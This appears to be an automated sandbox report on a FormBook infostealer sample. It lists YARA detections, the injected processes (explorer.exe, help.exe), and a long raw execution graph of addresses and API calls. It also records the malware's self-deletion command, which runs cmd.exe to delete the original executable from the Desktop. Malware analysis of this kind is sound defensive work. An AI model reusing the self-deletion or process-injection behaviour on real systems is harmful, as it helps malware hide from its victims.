                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Target ID:1
                          Start time:09:11:49
                          Start date:20/03/2023
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff75ed40000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Target ID:2
                          Start time:09:12:00
                          Start date:20/03/2023
                          Path:C:\Windows\SysWOW64\help.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\help.exe
                          Imagebase:0xb50000
                          File size:10240 bytes
                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          Target ID:3
                          Start time:09:12:07
                          Start date:20/03/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"
                          Imagebase:0xa60000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:5
                          Start time:09:12:07
                          Start date:20/03/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6edaf0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                            Execution Graph

                            Execution Coverage:7.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:1.1%
                            Total number of Nodes:1869
                            Total number of Limit Nodes:120
18095->18096 18103 38f114 18095->18103 18162 38edb0 18095->18162 18167 38ef30 18096->18167 18101 394a40 6 API calls 18097->18101 18102 38f0c8 18101->18102 18105 38ef90 7 API calls 18102->18105 18177 38eec0 18103->18177 18105->18107 18111 38f14e 18107->18111 18142 38dfb0 18107->18142 18110 394a40 6 API calls 18110->18111 18203 3841d0 18111->18203 18742 393d60 18112->18742 18114 38ef9d 18780 392a40 18114->18780 18116 38efa3 18814 390e50 18116->18814 18118 38efa9 18837 391bc0 18118->18837 18120 38efb1 18871 392d60 18120->18871 18122 38efb7 18874 3933d0 18122->18874 18128 38d910 18127->18128 18129 38d975 18127->18129 18128->18129 18208 38f210 18128->18208 18129->18089 18131 38d920 18132 394a40 6 API calls 18131->18132 18133 38d931 18132->18133 18134 394a40 6 API calls 18133->18134 18135 38d93c 18134->18135 18136 38d94a 18135->18136 18216 38d3c0 18135->18216 18137 394a40 6 API calls 18136->18137 18139 38d958 18137->18139 18140 394a40 6 API calls 18139->18140 18141 38d963 18140->18141 18141->18089 18144 38dfc8 18142->18144 18146 38e088 18142->18146 18143 38e021 18143->18087 18144->18143 18145 394a40 6 API calls 18144->18145 18145->18146 18146->18087 18149 38ec79 18147->18149 18148 394a40 6 API calls 18148->18149 18149->18148 18150 38ed23 18149->18150 18152 38ed1c 18149->18152 18151 394a40 6 API calls 18150->18151 18153 38ed49 18151->18153 18152->18095 18154 38ed9a 18153->18154 18155 394a40 6 API calls 18153->18155 18154->18095 18156 38ed61 18155->18156 18157 38ed8a 18156->18157 18158 394a40 6 API calls 18156->18158 18159 39bdb0 2 API calls 18157->18159 18160 38ed79 18158->18160 18159->18154 18161 394a40 6 API calls 18160->18161 18161->18157 18163 394a40 6 API calls 18162->18163 18164 38edd8 18163->18164 18165 38ede6 18164->18165 18166 38ec50 6 API calls 18164->18166 18165->18096 18166->18165 18168 38ef46 18167->18168 18170 38ef81 18167->18170 18169 39bf80 2 API calls 18168->18169 18171 38ef5c 18169->18171 18170->18103 18171->18170 18268 3917b0 18171->18268 18173 38ef6e 
18174 3917b0 7 API calls 18173->18174 18175 38ef7a 18174->18175 18176 39bdb0 2 API calls 18175->18176 18176->18170 18178 38eed8 18177->18178 18182 38ef27 18177->18182 18178->18182 18400 38fa90 18178->18400 18180 38ef13 18180->18182 18412 38fce0 18180->18412 18183 38edf0 18182->18183 18184 38eea8 18183->18184 18185 38ee0e 18183->18185 18184->18093 18187 38ea90 18184->18187 18185->18184 18186 394a40 6 API calls 18185->18186 18186->18184 18188 38eaac 18187->18188 18191 38eb8b 18187->18191 18189 39a480 2 API calls 18188->18189 18188->18191 18195 38eac7 18189->18195 18190 38ec3e 18190->18110 18190->18111 18193 38d140 2 API calls 18191->18193 18200 38ec21 18191->18200 18192 394a40 6 API calls 18192->18190 18194 38ebfb 18193->18194 18198 38d3c0 2 API calls 18194->18198 18194->18200 18494 38d140 18195->18494 18197 38eaff 18199 38b030 LdrLoadDll 18197->18199 18198->18200 18201 38eb10 18199->18201 18200->18190 18200->18192 18202 38b030 LdrLoadDll 18201->18202 18202->18191 18204 3841e1 18203->18204 18205 384202 18203->18205 18204->18205 18514 3837b0 18204->18514 18205->18093 18207 38423f 18207->18093 18209 39a1d0 LdrLoadDll 18208->18209 18210 38f237 18209->18210 18211 38f23e 18210->18211 18212 39a210 LdrLoadDll 18210->18212 18211->18131 18213 38f25c 18212->18213 18214 39a480 2 API calls 18213->18214 18215 38f268 18214->18215 18215->18131 18217 38d3e5 18216->18217 18218 38d3f3 18217->18218 18219 38d407 18217->18219 18221 38b030 LdrLoadDll 18218->18221 18220 38b030 LdrLoadDll 18219->18220 18222 38d416 18220->18222 18223 38d402 18221->18223 18225 38cf10 2 API calls 18222->18225 18224 38b030 LdrLoadDll 18223->18224 18226 38d604 18223->18226 18227 38d476 18224->18227 18225->18223 18226->18136 18228 38b030 LdrLoadDll 18227->18228 18229 38d4a7 18228->18229 18230 38d5a0 18229->18230 18257 38cfd0 18229->18257 18232 38cfd0 LdrLoadDll 18230->18232 18234 38d5b9 18232->18234 18237 38d080 LdrLoadDll 18234->18237 18235 38d57f 18240 38b030 LdrLoadDll 18235->18240 18236 38d4d5 18238 39a480 2 
API calls 18236->18238 18242 38d5c9 18237->18242 18239 38d4df 18238->18239 18243 38b030 LdrLoadDll 18239->18243 18240->18230 18241 39a480 2 API calls 18241->18226 18242->18241 18244 38d503 18243->18244 18245 38cfd0 LdrLoadDll 18244->18245 18246 38d519 18245->18246 18247 39a480 2 API calls 18246->18247 18248 38d523 18247->18248 18249 38b030 LdrLoadDll 18248->18249 18250 38d547 18249->18250 18251 38cfd0 LdrLoadDll 18250->18251 18252 38d55d 18251->18252 18261 38d080 18252->18261 18255 39a480 2 API calls 18256 38d577 18255->18256 18256->18136 18258 38cff5 18257->18258 18265 39a080 18258->18265 18263 38d0a4 18261->18263 18262 39a0d0 LdrLoadDll 18264 38d12b 18262->18264 18263->18262 18264->18255 18266 39af50 LdrLoadDll 18265->18266 18267 38d069 18266->18267 18267->18235 18267->18236 18269 3917d6 18268->18269 18270 3917eb 18269->18270 18271 391875 18269->18271 18272 38b030 LdrLoadDll 18270->18272 18287 39184f 18271->18287 18302 392d80 18271->18302 18273 3917fc 18272->18273 18276 39181a 18273->18276 18277 38b030 LdrLoadDll 18273->18277 18275 39195d 18282 391bab 18275->18282 18307 391170 18275->18307 18281 38b030 LdrLoadDll 18276->18281 18277->18276 18278 39186d 18278->18173 18280 3919b5 18280->18282 18311 398780 18280->18311 18283 39183e 18281->18283 18282->18173 18285 394a40 6 API calls 18283->18285 18285->18287 18286 3919cb 18289 394e40 LdrLoadDll 18286->18289 18287->18275 18287->18278 18288 38b030 LdrLoadDll 18287->18288 18290 391911 18288->18290 18292 3919e5 18289->18292 18291 38ace0 LdrLoadDll 18290->18291 18291->18275 18292->18282 18293 391370 6 API calls 18292->18293 18294 391a44 18293->18294 18295 391a4b 18294->18295 18296 38b030 LdrLoadDll 18294->18296 18295->18173 18297 391a83 18296->18297 18338 390fd0 18297->18338 18299 391b76 18299->18173 18300 391aa0 18300->18299 18344 3916e0 18300->18344 18303 38b030 LdrLoadDll 18302->18303 18304 392d9c 18303->18304 18305 394a40 6 API calls 18304->18305 18306 392e55 18304->18306 18305->18306 18306->18287 18308 391260 
18307->18308 18309 38ace0 LdrLoadDll 18308->18309 18310 391281 18309->18310 18310->18280 18312 39878f 18311->18312 18313 3988b4 18311->18313 18312->18313 18314 394e40 LdrLoadDll 18312->18314 18313->18286 18315 3987b8 18314->18315 18316 394e40 LdrLoadDll 18315->18316 18317 3987cd 18316->18317 18318 394e40 LdrLoadDll 18317->18318 18319 3987e2 18318->18319 18320 394e40 LdrLoadDll 18319->18320 18321 3987f7 18320->18321 18322 394e40 LdrLoadDll 18321->18322 18323 39880f 18322->18323 18324 394e40 LdrLoadDll 18323->18324 18325 398824 18324->18325 18326 394e40 LdrLoadDll 18325->18326 18327 398839 18326->18327 18328 394e40 LdrLoadDll 18327->18328 18329 39884e 18328->18329 18330 394e40 LdrLoadDll 18329->18330 18331 398866 18330->18331 18332 394e40 LdrLoadDll 18331->18332 18333 39887b 18332->18333 18334 394e40 LdrLoadDll 18333->18334 18335 398890 18334->18335 18336 394e40 LdrLoadDll 18335->18336 18337 3988a5 18336->18337 18337->18286 18339 390ff6 18338->18339 18340 38b030 LdrLoadDll 18339->18340 18341 39102c 18340->18341 18354 38d300 18341->18354 18343 3910ef 18343->18300 18345 3916f2 18344->18345 18346 391370 6 API calls 18345->18346 18347 391725 18346->18347 18348 391370 6 API calls 18347->18348 18349 391767 18348->18349 18350 391370 6 API calls 18349->18350 18351 39178b 18350->18351 18363 3915c0 18351->18363 18353 39179f 18353->18300 18355 38d317 18354->18355 18356 38f700 6 API calls 18355->18356 18357 38d35f 18356->18357 18358 39a6d0 LdrLoadDll 18357->18358 18359 38d38b 18358->18359 18360 38d392 18359->18360 18361 39a290 LdrLoadDll 18359->18361 18360->18343 18362 38d3a5 18361->18362 18362->18343 18364 3915fd 18363->18364 18365 39160b 18364->18365 18366 3916ad 18364->18366 18370 391650 18365->18370 18375 3920a0 18365->18375 18367 391370 6 API calls 18366->18367 18369 3916c8 18367->18369 18369->18353 18371 391689 18370->18371 18372 39bdb0 2 API calls 18370->18372 18373 391370 6 API calls 18371->18373 18372->18371 18374 39169e 18373->18374 18374->18353 18378 391e70 
18375->18378 18377 3920b4 18377->18370 18379 391e90 18378->18379 18380 391e86 18378->18380 18381 39bd30 2 API calls 18379->18381 18380->18377 18382 391ebf 18381->18382 18383 391ecc 18382->18383 18384 38b030 LdrLoadDll 18382->18384 18383->18377 18385 391f86 18384->18385 18386 38b030 LdrLoadDll 18385->18386 18387 391faa 18386->18387 18387->18383 18388 394a40 6 API calls 18387->18388 18389 391ff0 18388->18389 18390 394a40 6 API calls 18389->18390 18396 392003 18390->18396 18391 392092 18391->18377 18393 392076 18394 39bdb0 2 API calls 18393->18394 18395 392083 18394->18395 18395->18377 18396->18391 18397 3816a0 18396->18397 18398 39bd30 2 API calls 18397->18398 18399 382d11 18398->18399 18399->18393 18401 38fab5 18400->18401 18402 38b030 LdrLoadDll 18401->18402 18403 38fb70 18402->18403 18404 38b030 LdrLoadDll 18403->18404 18405 38fb94 18404->18405 18406 394a40 6 API calls 18405->18406 18408 38fbe7 18406->18408 18407 38fca1 18407->18180 18408->18407 18409 38b030 LdrLoadDll 18408->18409 18410 38fc4e 18409->18410 18411 394a40 6 API calls 18410->18411 18411->18407 18413 38fd05 18412->18413 18414 394e40 LdrLoadDll 18413->18414 18415 38fd50 18414->18415 18416 3900a1 18415->18416 18417 394a40 6 API calls 18415->18417 18416->18182 18418 38fd6c 18417->18418 18418->18416 18419 39a6d0 LdrLoadDll 18418->18419 18420 38fda2 18419->18420 18421 390089 18420->18421 18422 39d050 3 API calls 18420->18422 18423 39bdb0 2 API calls 18421->18423 18424 38fdc1 18422->18424 18423->18416 18424->18421 18425 38fea9 18424->18425 18426 399ef0 LdrLoadDll 18424->18426 18469 38c740 18425->18469 18427 38fe33 18426->18427 18427->18425 18429 38fe3b 18427->18429 18431 38fe8f 18429->18431 18433 38fe5e 18429->18433 18463 38c630 18429->18463 18432 39bdb0 2 API calls 18431->18432 18437 38fe9f 18432->18437 18436 39a480 2 API calls 18433->18436 18434 38ff09 18474 38c4b0 18434->18474 18440 38fe6e 18436->18440 18437->18182 18438 38c630 LdrLoadDll 18438->18434 18466 399320 18440->18466 18441 38ff2b 18443 390068 
18441->18443 18444 38ff39 18441->18444 18446 39bdb0 2 API calls 18443->18446 18445 39a4f0 LdrLoadDll 18444->18445 18448 38ff58 18445->18448 18447 39007f 18446->18447 18447->18182 18449 38f490 LdrLoadDll 18448->18449 18450 38ffbd 18449->18450 18450->18421 18451 38ffc8 18450->18451 18452 39bdb0 2 API calls 18451->18452 18453 38ffec 18452->18453 18454 39a050 LdrLoadDll 18453->18454 18455 390000 18454->18455 18456 39a000 LdrLoadDll 18455->18456 18457 390027 18456->18457 18458 39002e 18457->18458 18459 39a050 LdrLoadDll 18457->18459 18458->18182 18460 390050 18459->18460 18461 399e10 LdrLoadDll 18460->18461 18462 39005e 18461->18462 18462->18182 18464 39a000 LdrLoadDll 18463->18464 18465 38c66e 18464->18465 18465->18433 18467 38f660 LdrLoadDll 18466->18467 18468 399352 18467->18468 18468->18431 18470 38c776 18469->18470 18471 399ef0 LdrLoadDll 18469->18471 18472 39a4f0 LdrLoadDll 18470->18472 18471->18470 18473 38c78b 18472->18473 18473->18421 18473->18434 18473->18438 18475 38c4db 18474->18475 18476 38f490 LdrLoadDll 18475->18476 18477 38c53a 18476->18477 18478 38c583 18477->18478 18479 39a000 LdrLoadDll 18477->18479 18478->18441 18480 38c565 18479->18480 18481 38c56c 18480->18481 18485 38c58f 18480->18485 18482 39a050 LdrLoadDll 18481->18482 18483 38c579 18482->18483 18484 39a480 2 API calls 18483->18484 18484->18478 18486 38c5f9 18485->18486 18487 38c5d9 18485->18487 18488 39a050 LdrLoadDll 18486->18488 18489 39a480 2 API calls 18487->18489 18490 38c60b 18488->18490 18491 38c5e6 18489->18491 18492 39a480 2 API calls 18490->18492 18491->18441 18493 38c615 18492->18493 18493->18441 18495 38d16c 18494->18495 18496 38cfd0 LdrLoadDll 18495->18496 18497 38d1b6 18496->18497 18498 38d258 18497->18498 18511 39a190 18497->18511 18498->18197 18500 38d24f 18501 39a480 2 API calls 18500->18501 18501->18498 18502 38d1dd 18502->18500 18503 38d264 18502->18503 18504 39a190 LdrLoadDll 18502->18504 18505 39a480 2 API calls 18503->18505 18504->18502 18506 38d26d 18505->18506 18507 
38d2dc 18506->18507 18508 38cfd0 LdrLoadDll 18506->18508 18507->18197 18509 38d286 18508->18509 18509->18507 18510 394e40 LdrLoadDll 18509->18510 18510->18507 18512 39af50 LdrLoadDll 18511->18512 18513 39a1ac 18512->18513 18513->18502 18515 3837c2 18514->18515 18516 38384c 18514->18516 18515->18516 18517 383875 18515->18517 18523 383887 18515->18523 18516->18207 18559 384ad0 18517->18559 18519 383b02 18519->18207 18520 38387b 18520->18207 18521 383949 18544 383982 18521->18544 18563 384470 18521->18563 18522 38398e 18524 3839b3 18522->18524 18525 383993 18522->18525 18523->18519 18523->18521 18523->18522 18526 3839b8 18524->18526 18527 3839da 18524->18527 18525->18516 18572 384d40 18525->18572 18541 3839f5 18526->18541 18601 384580 18526->18601 18531 3839df 18527->18531 18532 383a01 18527->18532 18538 384580 3 API calls 18531->18538 18531->18541 18533 383a06 18532->18533 18543 383a26 18532->18543 18533->18516 18609 3848c0 18533->18609 18536 38d140 2 API calls 18537 38397a 18536->18537 18540 39a6a0 2 API calls 18537->18540 18538->18541 18540->18544 18541->18207 18545 383a69 18543->18545 18546 383a84 18543->18546 18544->18207 18614 3844c0 18545->18614 18546->18519 18549 383aad 18546->18549 18550 383a95 18546->18550 18552 383ae1 18549->18552 18555 383ac9 18549->18555 18620 384270 18550->18620 18552->18516 18662 384910 18552->18662 18553 383aa3 18553->18207 18631 384b40 18555->18631 18556 383af8 18556->18207 18558 383ad7 18558->18207 18560 384ae2 18559->18560 18562 384b05 18559->18562 18561 394e40 LdrLoadDll 18560->18561 18560->18562 18561->18562 18562->18520 18564 38f660 LdrLoadDll 18563->18564 18565 384482 18564->18565 18566 3887a0 8 API calls 18565->18566 18567 38448e 18566->18567 18568 39a480 2 API calls 18567->18568 18569 38449b 18568->18569 18570 394a40 6 API calls 18569->18570 18571 383967 18570->18571 18571->18536 18573 384d53 18572->18573 18673 3846d0 18572->18673 18575 38b030 LdrLoadDll 18573->18575 18576 384e90 18575->18576 18678 3845f0 18576->18678 18578 
384eaf 18579 38b030 LdrLoadDll 18578->18579 18580 384ed1 18579->18580 18581 3845f0 LdrLoadDll 18580->18581 18582 384f05 18581->18582 18583 3845f0 LdrLoadDll 18582->18583 18584 384f24 18583->18584 18585 38b030 LdrLoadDll 18584->18585 18586 384f46 18585->18586 18587 3845f0 LdrLoadDll 18586->18587 18588 384f7a 18587->18588 18589 3845f0 LdrLoadDll 18588->18589 18590 384f99 18589->18590 18684 391100 18590->18684 18592 384fb9 18593 3845f0 LdrLoadDll 18592->18593 18596 385021 18592->18596 18594 384ffb 18593->18594 18595 3845f0 LdrLoadDll 18594->18595 18595->18596 18597 3845f0 LdrLoadDll 18596->18597 18598 385099 18597->18598 18693 3847b0 18598->18693 18602 384599 18601->18602 18603 38ace0 LdrLoadDll 18602->18603 18604 3845b4 18603->18604 18605 394e40 LdrLoadDll 18604->18605 18606 3845c4 18605->18606 18607 3839ce 18606->18607 18608 38f170 3 API calls 18606->18608 18607->18207 18608->18607 18610 3848cf 18609->18610 18611 38f070 10 API calls 18609->18611 18612 38ef90 7 API calls 18610->18612 18613 3848fa 18610->18613 18611->18610 18612->18613 18613->18516 18615 3844d5 18614->18615 18619 383a7a 18614->18619 18616 38ace0 LdrLoadDll 18615->18616 18615->18619 18617 384543 18616->18617 18618 394e40 LdrLoadDll 18617->18618 18618->18619 18619->18207 18621 384286 18620->18621 18622 3843ce 18620->18622 18621->18622 18623 38b030 LdrLoadDll 18621->18623 18622->18553 18624 38434e 18623->18624 18625 394a40 6 API calls 18624->18625 18626 3843c7 18625->18626 18626->18622 18627 38ace0 LdrLoadDll 18626->18627 18628 384422 18627->18628 18629 394e40 LdrLoadDll 18628->18629 18630 384432 18629->18630 18630->18553 18632 384d2a 18631->18632 18633 384b53 18631->18633 18632->18558 18633->18632 18634 38b030 LdrLoadDll 18633->18634 18635 384bc3 18634->18635 18636 394a40 6 API calls 18635->18636 18637 384c24 18636->18637 18638 394a40 6 API calls 18637->18638 18639 384c31 18638->18639 18640 384470 8 API calls 18639->18640 18641 384c39 18640->18641 18642 384c5a 18641->18642 18643 384c40 18641->18643 
18644 394a40 6 API calls 18642->18644 18645 384c4b 18643->18645 18646 39bdb0 2 API calls 18643->18646 18649 384c7d 18644->18649 18645->18558 18646->18645 18647 384ccf 18699 384a60 18647->18699 18649->18647 18651 39a6d0 LdrLoadDll 18649->18651 18652 384cc8 18651->18652 18652->18647 18653 384ce6 18652->18653 18654 384cf1 18653->18654 18656 39bdb0 2 API calls 18653->18656 18655 38d140 2 API calls 18654->18655 18657 384d07 18655->18657 18656->18654 18658 399e10 LdrLoadDll 18657->18658 18659 384d13 18658->18659 18660 39a6a0 2 API calls 18659->18660 18661 384d1b 18660->18661 18661->18558 18663 384a4c 18662->18663 18664 384926 18662->18664 18663->18556 18664->18663 18665 38b030 LdrLoadDll 18664->18665 18666 384990 18665->18666 18667 38b030 LdrLoadDll 18666->18667 18668 3849a1 18667->18668 18669 394a40 6 API calls 18668->18669 18670 384a15 18669->18670 18671 384a30 18670->18671 18710 38b4d0 18670->18710 18671->18556 18674 394e40 LdrLoadDll 18673->18674 18677 3846fa 18674->18677 18675 384704 18675->18573 18676 399d00 LdrLoadDll 18676->18677 18677->18675 18677->18676 18679 384608 18678->18679 18683 38464a 18678->18683 18680 38ace0 LdrLoadDll 18679->18680 18679->18683 18681 38463c 18680->18681 18682 394e40 LdrLoadDll 18681->18682 18682->18683 18683->18578 18685 38b030 LdrLoadDll 18684->18685 18687 391116 18684->18687 18685->18687 18686 39112a 18689 38b030 LdrLoadDll 18686->18689 18687->18686 18688 38b030 LdrLoadDll 18687->18688 18688->18686 18690 391144 18689->18690 18691 391158 18690->18691 18692 394a40 6 API calls 18690->18692 18691->18592 18692->18691 18694 3847d5 18693->18694 18695 38af00 LdrLoadDll 18694->18695 18696 38485b 18695->18696 18697 394e40 LdrLoadDll 18696->18697 18698 3839a7 18697->18698 18698->18207 18700 394a40 6 API calls 18699->18700 18701 384a7a 18700->18701 18702 394a40 6 API calls 18701->18702 18703 384a85 18702->18703 18704 384ac2 18703->18704 18705 384ab8 18703->18705 18707 394a40 6 API calls 18703->18707 18704->18558 18706 